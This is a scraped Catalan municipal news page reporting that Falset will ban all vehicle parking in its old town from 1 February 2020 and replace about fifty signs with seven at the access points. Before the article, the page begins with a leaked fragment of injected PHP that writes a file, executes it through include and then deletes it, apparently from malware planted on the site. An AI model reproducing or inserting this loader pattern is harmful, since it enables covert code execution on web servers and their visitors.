");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Falset prohibeix l’estacionament de vehicles 
en tot el nucli antic
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Falset prohibeix l’estacionament de vehicles 
en tot el nucli antic (15/01/2020)

A partir de l’1 de febrer d’enguany ja no es podrà estacionar cap vehicle al nucli antic de Falset. De fet, la prohibició d’estacionar vehicles en aquesta àrea era pràcticament total, amb l’única excepció d’un tram del carrer Vallmoreres. La mesura permetrà retirar una cinquantena de senyals de prohibició d’estacionament dels carrers i places del nucli antic, que seran substituïdes per 7 senyals de prohibició d’estacionament que s’ubicaran en els 7 accessos a aquesta àrea: carrer de Baix, carrer Francesc Puig i Bes, carrer Santa Joaquima de Vedruna, Portal dels Ferrers, Portal del Bou, carrer del Malanyet i vial d’accés al Castell de Falset pel carrer Jaume Ciurana.

El regidor de Governació, Antoni Muntané, destaca que “la prohibició d’estacionament al nucli antic s’ha dut a terme d’una manera esglaonada”. Alhora, també incideix en què “posarem fi a un excés de senyalització que deslluïa els carrers i places del nucli antic, ja que en alguns punts s’hi compten fins a 6 senyals de prohibit estacionar, com és el cas de la plaça Àngel Marquès”.

Font: Ajuntament de Falset

Falset prohibeix l’estacionament de vehicles 
en tot el nucli antic

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona